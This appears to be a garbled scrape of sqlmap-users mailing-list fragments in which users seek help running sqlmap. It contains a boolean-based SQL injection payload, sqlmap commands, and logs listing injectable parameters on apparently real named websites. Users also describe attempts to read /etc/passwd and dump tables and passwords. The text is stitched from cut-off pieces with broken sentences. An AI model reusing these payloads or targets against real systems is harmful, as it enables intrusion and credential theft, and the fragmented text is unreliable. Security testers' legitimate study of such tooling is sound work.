Hi Stampar, Thanks for your email. I tried again with payload hidJumpId=54' OR '54'%3D'54' AND 6149=6149 AND 'izAQ'='izAQ&JumpButton=Go&JumpPage=22 but the result is the same. Maybe the server filters out the data. Thank you all the same.
user is DBA: True
[13:53:23] [INFO] fetching database users
[13:53:23] [INFO] fetching number of database users
[13:53:24] [INFO] retrieved:
[13:53:24] [CRITICAL] unable to retrieve the number of database users
best regards
bob
--
-- Original Message --
From: "
ameter 'hidJumpId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
N: command not found
[4]+ Stopped ./sqlmap.py -u "http://XXXp" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=[4]
ToNtSlashes(filename)
File "/pentest/database/sqlmap/lib/core/common.py", line 1500, in posixToNtSlashes
return filepath.replace('/', '\\')
AttributeError: 'NoneType' object has no attribute 'replace'
[*] shutting down at 20:15:56
I updated to sqlmap/1.0-dev (r5135) now, but the problems are all the same.
I use --technique=B --technique=T too.
-- Original Message --
From: "Iago Sousa"<146050...@gmail.com>;
Date: June 25, 2012, 7:15
To: "Bob";
Subject:
0AND%20%27Cqlm%27=%27Cqlm";
Is there anyone who can use sqlmap to find the injected point?
best regards
Bob--
http://www.alcosens.com/fsbClient/ezboard.jsp
injectable parameter is: "searchWord"
www.mobcstyle.com/goods/search.php", using HTTP method GET. The injectable
parameter is: "search_price_start
Is there anyone who can use sqlmap to find the injected point
Hi all,
I am using sqlmap to retrieve the database.
current-user and current-db work,
but retrieving tables, passwords etc. gets a response timeout.
Could you tell me what the problem is? How can I retrieve tables and passwords?
Thanks
bob
[09:56:07] [INFO] testing connection to the
Hi all,
I use file-read to retrieve a file on the server.
/etc/passwd works,
but for others the response is as follows.
16:44:14] [INFO] resuming back-end DBMS 'mysql 5' from session file
[16:44:14] [INFO] testing connection to the target url
sqlmap identified the following injection points with a
I met a problem with sqlmap working with SQL Server 2008. The details are
below. Sometimes it can retrieve the db and user, but sometimes it shows the below.
Place: GET
Parameter: nclassid
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: classid=4&n
[17:18:15] [CRITICAL] unhandled exception in sqlmap/0.9, retry your run with
the latest development version from the Subversion repository. If the exception
persists, please send by e-mail to sqlmap-users@lists.sourceforge.net the
following text and any information required to reproduce the bug.
is well written and covers most of what a beginner
would want to know. I appreciate it
Thanks!
Bob
- Original Message -
From: Miroslav Stampar
To: Bob Simonoff
Cc: sqlmap-users@lists.sourceforge.net
Sent: Sunday, December 11, 2011 3:37 AM
Subject: Re: [sqlmap-users] A
aptured. I looked for
each of the listed parameters in the posted data and they do not appear. (note
there are more parameters but I would rather send those privately if possible).
I am running a recent svn extract of the dev stream
everyone else too. I will try those if I can not get the latest version
working.
Bob
- Original Message -
From: Miroslav Stampar
To: Brandon Perry
Cc: sqlmap-users@lists.sourceforge.net
Sent: Monday, November 21, 2011 4:20 PM
Subject: Re: [sqlmap-users] %26 as part of a POST
argument of the command
line, but python is also at play here. I have not found an escape sequence
that allows both windows and python to be happy. I have tried various
combinations of ^, \, and %% to no avail.
So an example of post data would be:
--data="fld%26First=Bob&fld%26Last=Jones&quo